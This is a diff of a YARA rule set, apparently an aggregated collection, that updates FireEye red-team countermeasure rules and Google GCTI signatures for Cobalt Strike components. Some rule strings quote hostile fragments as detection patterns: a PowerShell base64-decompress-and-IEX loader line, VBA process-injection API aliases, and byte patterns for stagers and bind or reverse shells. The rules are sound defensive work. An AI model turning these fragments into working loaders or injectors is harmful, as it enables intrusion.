+		$typelibguid0 = "9940e18f-e3c7-450f-801a-07dd534ccb9a" ascii nocase wide
 
 	condition:
-		( uint16( 0 ) == 0x5A4D ) and ( uint32( uint32( 0x3C ) ) == 0x00004550 ) and ( uint16( uint32( 0x3C ) + 0x18 ) == 0x020B ) and all of them
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule FIREEYE_RT_APT_Trojan_Win_REDFLARE_6 : FILE
+rule FIREEYE_RT_Methodology_OLE_CHARENCODING_2 : FILE
 {
 	meta:
-		description = "No description has been set in the source file - FireEye-RT"
+		description = "Looking for suspicious char encoding"
 		author = "FireEye"
-		id = "5875a9ec-c3ee-57f0-a430-4443db585def"
-		date = "2020-12-01"
-		date = "2020-12-01"
+		id = "7abd1a11-7a55-50ac-aa6b-537e7c59a5ab"
+		date = "2020-12-09"
 		modified = "2020-12-09"
 		reference = "https://github.com/mandiant/red_team_tool_countermeasures/"
-		source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/REDFLARE/supplemental/yara/APT_Trojan_Win_REDFLARE_6.yar#L4-L20"
+		source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/SINFULOFFICE/supplemental/yara/Methodology_OLE_CHARENCODING_2.yar#L4-L23"
 		license_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/LICENSE.txt"
-		hash = "294b1e229c3b1efce29b162e7b3be0ab, 6902862bd81da402e7ac70856afbe6a2"
-		logic_hash = "1e6f8320e0c0b601fc72fa4d9c61e46adfbcd84638c97da5988ca848e036312a"
-		score = 75
+		hash = "41b70737fa8dda75d5e95c82699c2e9b"
+		logic_hash = "20843295531dfd88934fe0902a5101c5c0828e82df3289d7f263f16df9c92324"
+		score = 65
 		quality = 75
 		tags = "FILE"
-		rev = 2
+		rev = 4
 
 	strings:
-		$s1 = "RevertToSelf" fullword
-		$s2 = "Unsuccessful" fullword
-		$s3 = "Successful" fullword
-		$s4 = "runCommand" fullword
-		$s5 = "initialize" fullword
+		$echo1 = "101;99;104;111;32;111;102;102;" ascii wide
+		$echo2 = "101:99:104:111:32:111:102:102:" ascii wide
+		$echo3 = "101x99x104x111x32x111x102x102x" ascii wide
+		$pe1 = "77;90;144;" ascii wide
+		$pe2 = "77:90:144:" ascii wide
+		$pe3 = "77x90x144x" ascii wide
+		$pk1 = "80;75;3;4;" ascii wide
+		$pk2 = "80:75:3:4:" ascii wide
+		$pk3 = "80x75x3x4x" ascii wide
 
 	condition:
-		( uint16( 0 ) == 0x5A4D ) and ( uint32( uint32( 0x3C ) ) == 0x00004550 ) and all of them
+		( uint32( 0 ) == 0xe011cfd0 ) and filesize < 10MB and any of them
 }
-rule FIREEYE_RT_APT_Trojan_Linux_REDFLARE_1 : FILE
+rule FIREEYE_RT_Loader_MSIL_Netshshellcoderunner_1 : FILE
 {
 	meta:
-		description = "No description has been set in the source file - FireEye-RT"
+		description = "The TypeLibGUID present in a .NET binary maps directly to the ProjectGuid found in the '.csproj' file of a .NET project. This rule looks for .NET PE files that contain the ProjectGuid found in the 'NetshShellCodeRunner' project."
 		author = "FireEye"
-		id = "220302bc-4ed3-5e10-9bd2-a8ed2bdaef73"
-		date = "2020-12-02"
-		date = "2020-12-02"
+		id = "b3521812-7ea3-5f80-89bd-3bdd71b687f2"
+		date = "2020-12-09"
 		modified = "2020-12-09"
 		reference = "https://github.com/mandiant/red_team_tool_countermeasures/"
-		source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/REDFLARE/supplemental/yara/APT_Trojan_Linux_REDFLARE_1.yar#L4-L20"
+		source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/NETSHSHELLCODERUNNER/production/yara/Loader_MSIL_NetshShellCodeRunner_1.yar#L4-L15"
 		license_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/LICENSE.txt"
-		hash = "79259451ff47b864d71fb3f94b1774f3, 82773afa0860d668d7fe40e3f22b0f3e"
-		logic_hash = "282f11c4c86d88d05f11e92f5483701d9a54c2dd39f21316cd271aa78a338d0f"
+		hash = "dd8805d0e470e59b829d98397507d8c2"
+		logic_hash = "97f6475a9d42697f633e06a9b04a85021ca4920145eb4af257d71b431448f0e9"
 		score = 75
-		quality = 75
+		quality = 73
 		tags = "FILE"
-		rev = 1
+		rev = 2
 
 	strings:
-		$s1 = "find_applet_by_name" fullword
-		$s2 = "bb_basename" fullword
-		$s3 = "hk_printf_chk" fullword
-		$s4 = "runCommand" fullword
-		$s5 = "initialize" fullword
+		$typelibguid0 = "49c045bc-59bb-4a00-85c3-4beb59b2ee12" ascii nocase wide
 
 	condition:
-		( uint32( 0 ) == 0x464c457f ) and all of them
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
 /*
  * YARA Rule Set
  * Repository Name: GCTI
  * Repository: https://github.com/chronicle/GCTI
- * Retrieval Date: 2025-06-08
+ * Retrieval Date: 2025-06-15
  * Git Commit: 1c5fd42b1895098527fde00c2d9757edf6b303bb
  * Number of Rules: 90
  * Skipped: 0 (age), 1 (quality), 0 (score), 0 (importance)
@@ -76233,26 +76793,545 @@ rule FIREEYE_RT_APT_Trojan_Linux_REDFLARE_1 : FILE
 
        http://www.apache.org/licenses/LICENSE-2.0
 
-   Unless required by applicable law or agreed to in writing, software
-   distributed under the License is distributed on an "AS IS" BASIS,
-   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-   See the License for the specific language governing permissions and
-   limitations under the License.
+   Unless required by applicable law or agreed to in writing, software
+   distributed under the License is distributed on an "AS IS" BASIS,
+   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+   See the License for the specific language governing permissions and
+   limitations under the License.
+
+ */
+rule GCTI_Cobaltstrike_Resources_Elevate_Dll_V3_0_To_V3_14_And_Sleeve_Elevate_Dll_V4_X
+{
+	meta:
+		description = "Cobalt Strike's resources/elevate.dll signature for v3.0 to v3.14 and sleeve/elevate.dll for v4.x"
+		author = "gssincla@google.com"
+		id = "170f62a2-ba4f-5be8-9ec5-402eb7bbde4e"
+		date = "2022-11-18"
+		modified = "2022-11-19"
+		reference = "https://cloud.google.com/blog/products/identity-security/making-cobalt-strike-harder-for-threat-actors-to-abuse"
+		source_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/YARA/CobaltStrike/CobaltStrike__Resources_Elevate_Dll_v3_0_to_v3_14_and_Sleeve_Elevate_Dll_v4_x.yara#L17-L68"
+		license_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/LICENSE"
+		hash = "6deeb2cafe9eeefe5fc5077e63cc08310f895e9d5d492c88c4e567323077aa2f"
+		logic_hash = "766a0a390ed8cefe43d82a054a9b2cfec7eced75e0d7ee10231215043577b75e"
+		score = 75
+		quality = 85
+		tags = ""
+
+	strings:
+		$wnd_proc = {
+			6A 00
+			6A 28
+			68 00 01 00 00
+			5?
+			C7 [5] 01 00 00 00
+			FF ??
+			6A 00
+			6A 27
+			68 00 01 00 00
+			5?
+			FF ??
+			6A 00
+			6A 00
+			68 01 02 00 00
+			5?
+			FF ??
+		}
+
+	condition:
+		$wnd_proc
+}
+rule GCTI_Cobaltstrike_Resources_Bypassuactoken_Dll_V3_11_To_V3_14
+{
+	meta:
+		description = "Cobalt Strike's resources/bypassuactoken.dll from v3.11 to v3.14 (32-bit version)"
+		author = "gssincla@google.com"
+		id = "b9f25fa5-bd1d-5ba0-9b1d-bb97e1dbf76b"
+		date = "2022-11-18"
+		modified = "2022-11-19"
+		reference = "https://cloud.google.com/blog/products/identity-security/making-cobalt-strike-harder-for-threat-actors-to-abuse"
+		source_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/YARA/CobaltStrike/CobaltStrike__Resources_Bypassuactoken_Dll_v3_11_to_v3_14.yara#L17-L151"
+		license_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/LICENSE"
+		hash = "df1c7256dfd78506e38c64c54c0645b6a56fc56b2ffad8c553b0f770c5683070"
+		logic_hash = "fe0780b7f4c16b55cfa00ea7de4da8ce349ec8a72de763b72e816ebc8e934b6d"
+		score = 75
+		quality = 85
+		tags = ""
+
+	strings:
+		$isHighIntegrityProcess = {
+			5?
+			5?
+			5?
+			8B ??
+			6A 19
+			5?
+			FF 15 [4]
+			85 C0
+			75 ??
+			FF 15 [4]
+			83 ?? 7A
+			75 ??
+			FF [2]
+			5?
+			FF 15 [4]
+			8B ??
+			8D [2]
+			5?
+			FF [2]
+			5?
+			6A 19
+			5?
+			FF 15 [4]
+			85 C0
+			74 ??
+			FF ??
+			FF 15 [4]
+			8A ??
+			FE C8
+			0F B6 C0
+			5?
+			FF ??
+			FF 15 [4]
+			B? 01 00 00 00
+			5?
+			81 ?? 00 30 00 00
+		}
+		$executeTaskmgr = {
+			6A 3C
+			8D ?? C4
+			8B ??
+			6A 00
+			5?
+			8B ??
+			E8 [4]
+			83 C4 0C
+			C7 [2] 3C 00 00 00
+			8D [2]
+			C7 [2] 40 00 00 00
+			C7 [6]
+			C7 [2] 00 00 00 00
+			5?
+			C7 [2] 00 00 00 00
+			C7 [6]
+			C7 [2] 00 00 00 00
+			FF 15 [4]
+			FF 75 FC
+		}
+
+	condition:
+		all of them
+}
+rule GCTI_Cobaltstrike_Resources_Httpstager64_Bin_V3_2_Through_V4_X
+{
+	meta:
+		description = "Cobalt Strike's resources/httpstager64.bin signature for versions v3.2 to v4.x"
+		author = "gssincla@google.com"
+		id = "5530dce8-e5a1-5133-9b05-464e3397084a"
+		date = "2022-11-18"
+		modified = "2022-11-19"
+		reference = "https://cloud.google.com/blog/products/identity-security/making-cobalt-strike-harder-for-threat-actors-to-abuse"
+		source_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/YARA/CobaltStrike/CobaltStrike__Resources_Httpstager64_Bin_v3_2_through_v4_x.yara#L17-L85"
+		license_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/LICENSE"
+		hash = "ad93d1ee561bc25be4a96652942f698eac9b133d8b35ab7e7d3489a25f1d1e76"
+		logic_hash = "23666169565c6b3e5fa71767dc31096e7a25be049eeab16b074053d76c97c70b"
+		score = 75
+		quality = 85
+		tags = ""
+
+	strings:
+		$apiLocator = {
+			48 [2]
+			AC
+			41 [2] 0D
+			41 [2]
+			38 ??
+			75 ??
+			4C [4]
+			45 [2]
+			75 ??
+			5?
+			44 [2] 24
+			49 [2]
+			66 [4]
+			44 [2] 1C
+			49 [2]
+			41 [3]
+			48
+		}
+		$postInternetOpenJmp = {
+			41 ?? 3A 56 79 A7
+			FF ??
+			EB
+		}
+
+	condition:
+		$apiLocator and $postInternetOpenJmp
+}
+rule GCTI_Cobaltstrike_Resources_Command_Ps1_V2_5_To_V3_7_And_Resources_Compress_Ps1_V3_8_To_V4_X
+{
+	meta:
+		description = "Cobalt Strike's resources/command.ps1 for versions 2.5 to v3.7 and resources/compress.ps1 from v3.8 to v4.x"
+		author = "gssincla@google.com"
+		id = "c0b81deb-ed20-5f7e-8e15-e6a9e9362594"
+		date = "2022-11-18"
+		modified = "2022-11-22"
+		reference = "https://cloud.google.com/blog/products/identity-security/making-cobalt-strike-harder-for-threat-actors-to-abuse"
+		source_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/YARA/CobaltStrike/CobaltStrike__Resources_Command_Ps1_v2_5_to_v3_7_and_Resources_Compress_Ps1_v3_8_to_v4_x.yara#L17-L33"
+		license_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/LICENSE"
+		hash = "932dec24b3863584b43caf9bb5d0cfbd7ed1969767d3061a7abdc05d3239ed62"
+		logic_hash = "31cf47060757b086d325cd205724a7be8931bbbc6ff2f4be67a6179ee99c42ca"
+		score = 75
+		quality = 85
+		tags = ""
+
+	strings:
+		$ps1 = "$s=New-Object \x49O.MemoryStream(,[Convert]::\x46romBase64String(" nocase
+		$ps2 = "));IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s,[IO.Compression.CompressionMode]::Decompress))).ReadToEnd();" nocase
+
+	condition:
+		all of them
+}
+rule GCTI_Cobaltstrike_Resources_Template_X86_Vba_V3_8_To_V4_X
+{
+	meta:
+		description = "Cobalt Strike's resources/template.x86.vba signature for versions v3.8 to v4.x"
+		author = "gssincla@google.com"
+		id = "11c7758e-93b2-5fe3-873d-b98de579d2b4"
+		date = "2022-11-18"
+		modified = "2022-11-19"
+		reference = "https://cloud.google.com/blog/products/identity-security/making-cobalt-strike-harder-for-threat-actors-to-abuse"
+		source_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/YARA/CobaltStrike/CobaltStrike__Resources_Template_x86_Vba_v3_8_to_v4_x.yara#L17-L37"
+		license_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/LICENSE"
+		hash = "fc66cb120e7bc9209882620f5df7fdf45394c44ca71701a8662210cf3a40e142"
+		logic_hash = "7114515477d82651806eccef34f599f6ffd4614f987dee29417ac6ef7a1a1c38"
+		score = 75
+		quality = 85
+		tags = ""
+
+	strings:
+		$createstuff = "Function CreateStuff Lib \"kernel32\" Alias \"CreateRemoteThread\"" nocase
+		$allocstuff = "Function AllocStuff Lib \"kernel32\" Alias \"VirtualAllocEx\"" nocase
+		$writestuff = "Function WriteStuff Lib \"kernel32\" Alias \"WriteProcessMemory\"" nocase
+		$runstuff = "Function RunStuff Lib \"kernel32\" Alias \"CreateProcessA\"" nocase
+		$vars = "Dim rwxpage As Long" nocase
+		$res = "RunStuff(sNull, sProc, ByVal 0&, ByVal 0&, ByVal 1&, ByVal 4&, ByVal 0&, sNull, sInfo, pInfo)"
+		$rwxpage = "AllocStuff(pInfo.hProcess, 0, UBound(myArray), &H1000, &H40)"
+
+	condition:
+		all of them and @vars [ 1 ] < @res [ 1 ] and @allocstuff [ 1 ] < @rwxpage [ 1 ]
+}
+rule GCTI_Cobaltstrike_Resources_Bypassuac_Dll_V1_49_To_V3_14_And_Sleeve_Bypassuac_Dll_V4_0_To_V4_X
+{
+	meta:
+		description = "Cobalt Strike's resources/bypassuac(-x86).dll from v1.49 to v3.14 (32-bit version) and sleeve/bypassuac.dll from v4.0 to at least v4.4"
+		author = "gssincla@google.com"
+		id = "614046b5-cf81-56a5-8824-b3a7e14a8ed5"
+		date = "2022-11-18"
+		modified = "2022-11-19"
+		reference = "https://cloud.google.com/blog/products/identity-security/making-cobalt-strike-harder-for-threat-actors-to-abuse"
+		source_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/YARA/CobaltStrike/CobaltStrike__Resources_Bypassuac_Dll_v1_49_to_v3_14_and_Sleeve_Bypassuac_Dll_v4_0_to_v4_x.yara#L17-L94"
+		license_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/LICENSE"
+		hash = "91d12e1d09a642feedee5da966e1c15a2c5aea90c79ac796e267053e466df365"
+		logic_hash = "7d59c0286f1936e386519a919472d01581b68a8167c89bd3cd3108d45251119a"
+		score = 75
+		quality = 85
+		tags = ""
+
+	strings:
+		$deleteFileCOM = {
+			A1 [4]
+			6A 00
+			8B ??
+			5?
+			5?
+			FF ?? 48
+			85 ??
+			75 ??
+			A1 [4]
+			5?
+			8B ??
+			FF ?? 54
+		}
+		$copyFileCOM = {
+			A1 [4]
+			6A 00
+			FF [2]
+			8B ??
+			FF [5]
+			FF [5]
+			5?
+			FF ?? 40
+			85 ??
+			[2 - 6]
+			A1 [4]
+			5?
+			8B ??
+			FF ?? 54
+		}
+
+	condition:
+		all of them
+}
+rule GCTI_Cobaltstrike_Resources_Httpsstager_Bin_V2_5_Through_V4_X
+{
+	meta:
+		description = "Cobalt Strike's resources/httpsstager.bin signature for versions 2.5 to 4.x"
+		author = "gssincla@google.com"
+		id = "f45aa40a-3936-50f9-a60e-de7181862d19"
+		date = "2022-11-18"
+		modified = "2022-11-19"
+		reference = "https://cloud.google.com/blog/products/identity-security/making-cobalt-strike-harder-for-threat-actors-to-abuse"
+		source_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/YARA/CobaltStrike/CobaltStrike__Resources_Httpsstager_Bin_v2_5_through_v4_x.yara#L17-L95"
+		license_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/LICENSE"
+		hash = "5ebe813a4c899b037ac0ee0962a439833964a7459b7a70f275ac73ea475705b3"
+		logic_hash = "d2f722809a59faf8ecd85e46eadf58bf23ba5f515ad9c949843f1e6bfeec1fbf"
+		score = 75
+		quality = 85
+		tags = ""
+
+	strings:
+		$apiLocator = {
+			31 ??
+			AC
+			C1 ?? 0D
+			01 ??
+			38 ??
+			75 ??
+			03 [2]
+			3B [2]
+			75 ??
+			5?
+			8B ?? 24
+			01 ??
+			66 8B [2]
+			8B ?? 1C
+			01 ??
+			8B ?? 8B
+			01 ??
+			89 [3]
+			5?
+			5?
+		}
+		$InternetSetOptionA = {
+			6A 04
+			5?
+			6A 1F
+			5?
+			68 75 46 9E 86
+			FF
+		}
+
+	condition:
+		$apiLocator and $InternetSetOptionA
+}
+rule GCTI_Cobaltstrike_Resources__Template_Vbs_V3_3_To_V4_X
+{
+	meta:
+		description = "Cobalt Strike's resources/btemplate.vbs signature for versions v3.3 to v4.x"
+		author = "gssincla@google.com"
+		id = "62f35d02-1e4e-5651-b575-888ce06b8bdd"
+		date = "2022-11-18"
+		modified = "2022-11-22"
+		reference = "https://cloud.google.com/blog/products/identity-security/making-cobalt-strike-harder-for-threat-actors-to-abuse"
+		source_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/YARA/CobaltStrike/CobaltStrike__Resources_Template_Vbs_v3_3_to_v4_x.yara#L17-L41"
+		license_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/LICENSE"
+		hash = "e0683f953062e63b2aabad7bc6d76a78748504b114329ef8e2ece808b3294135"
+		logic_hash = "c9df0e287eb0eacf7c6cfcf3f6d1043ae6f2fdacd3b22bd42ac71f4b0d7226ff"
+		score = 75
+		quality = 83
+		tags = ""
+
+	strings:
+		$ea = "Excel.Application" nocase
+		$vis = "Visible = False" nocase
+		$wsc = "Wscript.Shell" nocase
+		$regkey1 = "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\" nocase
+		$regkey2 = "\\Excel\\Security\\AccessVBOM" nocase
+		$regwrite = ".RegWrite" nocase
+		$dw = "REG_DWORD"
+		$code = ".CodeModule.AddFromString"
+		$ao = { 41 75 74 6f 5f 4f 70 65 6e }
+		$da = ".DisplayAlerts"
+
+	condition:
+		all of them
+}
+rule GCTI_Cobaltstrike_Resources_Browserpivot_X64_Bin_V1_48_To_V3_14_And_Sleeve_Browserpivot_X64_Dll_V4_0_To_V4_X
+{
+	meta:
+		description = "Cobalt Strike's resources/browserpivot.x64.bin from v1.48 to v3.14 and sleeve/browserpivot.x64.dll from v4.0 to at least v4.4"
+		author = "gssincla@google.com"
+		id = "a5dfae85-ff9c-5ca5-9ac0-041c6108a6ed"
+		date = "2022-11-18"
+		modified = "2022-11-19"
+		reference = "https://cloud.google.com/blog/products/identity-security/making-cobalt-strike-harder-for-threat-actors-to-abuse"
+		source_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/YARA/CobaltStrike/CobaltStrike__Resources_Browserpivot_x64_Bin_v1_48_to_v3_14_and_Sleeve_Browserpivot_x64_Dll_v4_0_to_v4_x.yara#L17-L64"
+		license_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/LICENSE"
+		hash = "0ad32bc4fbf3189e897805cec0acd68326d9c6f714c543bafb9bc40f7ac63f55"
+		logic_hash = "a59f19b6e258b724ed88b4255717d066319ba5fb0838d6c6ed11355e9d9b1c22"
+		score = 75
+		quality = 85
+		tags = ""
+
+	strings:
+		$socket_recv = {
+			FF 15 [4]
+			83 ?? FF
+			74 ??
+			85 ??
+			74 ??
+			03 ??
+			83 ?? 02
+			72 ??
+			8D ?? FF
+			80 [2] 0A
+			75 ??
+			8D ?? FE
+			80 [2] 0D
+		}
+		$fmt = "%1024[^ ] %8[^:]://%1016[^/]%7168[^ ] %1024[^ ]"
+
+	condition:
+		all of them
+}
+rule GCTI_Cobaltstrike_Resources_Bind_Bin_V2_5_Through_V4_X
+{
+	meta:
+		description = "Cobalt Strike's resources/bind.bin signature for versions 2.5 to 4.x"
+		author = "gssincla@google.com"
+		id = "32f129c1-9845-5843-9e16-7d9af217b8e2"
+		date = "2022-11-18"
+		modified = "2022-11-19"
+		reference = "https://cloud.google.com/blog/products/identity-security/making-cobalt-strike-harder-for-threat-actors-to-abuse"
+		source_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/YARA/CobaltStrike/CobaltStrike__Resources_Bind_Bin_v2_5_through_v4_x.yara#L17-L111"
+		license_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/LICENSE"
+		hash = "3727542c0e3c2bf35cacc9e023d1b2d4a1e9e86ee5c62ee5b66184f46ca126d1"
+		logic_hash = "cf04e257590cf0673059348f5c15926918eb8aee40e864ae65979360aca80013"
+		score = 75
+		quality = 85
+		tags = ""
+
+	strings:
+		$apiLocator = {
+			31 ??
+			AC
+			C1 ?? 0D
+			01 ??
+			38 ??
+			75 ??
+			03 [2]
+			3B [2]
+			75 ??
+			5?
+			8B ?? 24
+			01 ??
+			66 8B [2]
+			8B ?? 1C
+			01 ??
+			8B ?? 8B
+			01 ??
+			89 [3]
+			5?
+			5?
+		}
+		$ws2_32 = {
+			5D
+			68 33 32 00 00
+			68 77 73 32 5F
+		}
+		$listenaccept = {
+			5?
+			5?
+			68 B7 E9 38 FF
+			FF ??
+			5?
+			5?
+			5?
+			68 74 EC 3B E1
+		}
+
+	condition:
+		$apiLocator and $ws2_32 and $listenaccept
+}
+rule GCTI_Cobaltstrike_Resources_Covertvpn_Dll_V2_1_To_V4_X
+{
+	meta:
+		description = "Cobalt Strike's resources/covertvpn.dll signature for version v2.2 to v4.4"
+		author = "gssincla@google.com"
+		id = "a65b855c-5703-5b9f-bb57-da8ebf898f9b"
+		date = "2022-11-18"
+		modified = "2022-11-19"
+		reference = "https://cloud.google.com/blog/products/identity-security/making-cobalt-strike-harder-for-threat-actors-to-abuse"
+		source_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/YARA/CobaltStrike/CobaltStrike__Resources_Covertvpn_Dll_v2_1_to_v4_x.yara#L17-L120"
+		license_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/LICENSE"
+		hash = "0a452a94d53e54b1df6ba02bc2f02e06d57153aad111171a94ec65c910d22dcf"
+		logic_hash = "1f6e4254fdfd4f9b13c2000333aabbb7da90d2df7ee1b12faa6ea3c066351468"
+		score = 75
+		quality = 85
+		tags = ""
+
+	strings:
+		$dropComponentsAndActivateDriver_prologue = {
+			5?
+			68 [4]
+			68 [4]
+			C7 [3-5] 00 00 00 00
+			FF 15 [4]
+			50
+			FF 15 [4]
+			8B ??
+			85 ??
+			74 ??
+			8D [3-5]
+			5?
+			FF 15 [4]
+			50
+		}
+		$dropFile = {
+			6A 00
+			5?
+			E8 [4]
+			83 C4 08
+			83 F8 FF
+			74 ??
+			5?
+			[0-5]
+			E8 [4]
+			83 C4 ??
+			[0-2]
+			6A 00
+			68 80 01 00 00
+			6A 02
+			6A 00
+			6A 05
+			68 00 00 00 40
+			5?
+			FF 15 [4]
+			8B ??
+			83 ?? FF
+			75 ??
+			FF 15 [4]
+			5?
+		}
+		$nfp = "npf.sys" nocase
+		$wpcap = "wpcap.dll" nocase
 
- */
-rule GCTI_Cobaltstrike_Resources_Bind64_Bin_V2_5_Through_V4_X
+	condition:
+		all of them
+}
+rule GCTI_Cobaltstrike_Resources_Reverse64_Bin_V2_5_Through_V4_X
 {
 	meta:
-		description = "Cobalt Strike's resources/bind64.bin signature for versions v2.5 to v4.x"
+		description = "Cobalt Strike's resources/reverse64.bin signature for versions v2.5 to v4.x"
 		author = "gssincla@google.com"
-		id = "a01e7bc3-40e9-5f87-8fd6-926972be273b"
+		id = "966e6e4c-85e2-5c94-8245-25367802b7d2"
 		date = "2022-11-18"
 		modified = "2022-11-19"
 		reference = "https://cloud.google.com/blog/products/identity-security/making-cobalt-strike-harder-for-threat-actors-to-abuse"
-		source_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/YARA/CobaltStrike/CobaltStrike__Resources_Bind64_Bin_v2_5_through_v4_x.yara#L17-L109"
+		source_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/YARA/CobaltStrike/CobaltStrike__Resources_Reverse64_Bin_v2_5_through_v4_x.yara#L17-L99"
 		license_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/LICENSE"
-		hash = "5dd136f5674f66363ea6463fd315e06690d6cb10e3cc516f2d378df63382955d"
-		logic_hash = "ba79abc5cfeaccb94699c0d85c16b2ddf6820bc148c0fd1c9b33c07222e36cb6"
+		hash = "d2958138c1b7ef681a63865ec4a57b0c75cc76896bf87b21c415b7ec860397e8"
+		logic_hash = "c657234156293b9ac363b677490739ab0b5cc2ef149c9d9c37332dab9bb012f6"
 		score = 75
 		quality = 85
 		tags = ""
@@ -76278,212 +77357,127 @@ rule GCTI_Cobaltstrike_Resources_Bind64_Bin_V2_5_Through_V4_X
 			48
 		}
 		$calls = {
-			41 BA C2 DB 37 67
-			FF D5
-			48 [2]
-			48 [2]
-			41 BA B7 E9 38 FF
+			48 89 C1
+			41 BA EA 0F DF E0
 			FF D5
-			4D [2]
 			48 [2]
+			6A ??
+			41 ??
+			4C [2]
 			48 [2]
-			41 BA 74 EC 3B E1
+			41 BA 99 A5 74 61
 			FF D5
-			48 [2]
-			48 [2]
-			41 BA 75 6E 4D 61
 		}
 
 	condition:
 		$apiLocator and $calls
 }
-rule GCTI_Cobaltstrike_Resources_Template_X64_Ps1_V3_0_To_V4_X_Excluding_3_12_3_13
+rule GCTI_Cobaltstrike_Resources_Xor_Bin_V2_X_To_V4_X
 {
 	meta:
-		description = "Cobalt Strike's resources/template.x64.ps1, resources/template.hint.x64.ps1 and resources/template.hint.x32.ps1 from v3.0 to v4.x except 3.12 and 3.13"
+		description = "Cobalt Strike's resource/xor.bin signature for version 2.x through 4.x"
 		author = "gssincla@google.com"
-		id = "5a808113-aacb-56ca-b3ec-166c73c54b85"
+		id = "1754746c-3a42-5f7d-808a-ba2e1c0a270e"
 		date = "2022-11-18"
 		modified = "2022-11-19"
 		reference = "https://cloud.google.com/blog/products/identity-security/making-cobalt-strike-harder-for-threat-actors-to-abuse"
-		source_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/YARA/CobaltStrike/CobaltStrike__Resources_Template_x64_Ps1_v3_0_to_v4_x_excluding_3_12_3_13.yara#L17-L37"
+		source_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/YARA/CobaltStrike/CobaltStrike__Resources_Xor_Bin__32bit_v2_x_to_4_x.yara#L17-L36"
 		license_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/LICENSE"
-		hash = "ff743027a6bcc0fee02107236c1f5c96362eeb91f3a5a2e520a85294741ded87"
-		logic_hash = "80823b8590004686ebd83958cad16094ea2f6958a837d87934507531a00df77a"
+		hash = "211ccc5d28b480760ec997ed88ab2fbc5c19420a3d34c1df7991e65642638a6f"
+		logic_hash = "ad662a263ede6c3ba964baf8abe4848ed1e994f2c236d4315cb60c1d51442620"
 		score = 75
-		quality = 81
+		quality = 85
 		tags = ""
 
 	strings:
-		$dda = "[AppDomain]::CurrentDomain.DefineDynamicAssembly" nocase
-		$imm = "InMemoryModule" nocase
-		$mdt = "MyDelegateType" nocase
-		$rd = "New-Object System.Reflection.AssemblyName('ReflectedDelegate')" nocase
-		$data = "[Byte[]]$var_code = [System.Convert]::FromBase64String(" nocase
-		$64bitSpecific = "[IntPtr]::size -eq 8"
-		$mandatory = "Mandatory = $True"
+		$stub52 = {fc e8 ?? ?? ?? ?? [1-32] eb 27 5? 8b ??    83 c? ?4 8b ??    31 ?? 83 c? ?4 5? 8b ??    31 ?? 89 ??    31 ?? 83 c? ?4 83 e? ?4 31 ?? 39 ?? 74 ?2 eb ea 5? ff e? e8 d4 ff ff ff}
